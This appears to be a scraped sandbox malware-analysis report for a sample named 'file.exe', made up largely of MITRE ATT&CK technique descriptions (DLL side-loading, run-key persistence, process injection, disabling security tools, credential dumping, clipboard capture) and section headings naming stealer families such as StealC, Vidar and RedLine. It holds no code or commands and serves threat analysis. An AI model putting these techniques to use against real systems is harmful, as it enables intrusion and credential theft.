Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: Xworm

Threatname: Vidar

Threatname: Amadey

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\CBFCFBFBFBKFIDHJKFCAFCFBKJ

C:\ProgramData\CFIIIJJKJKFHIDGDBAKJ

Windows Analysis Report
file.exe

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre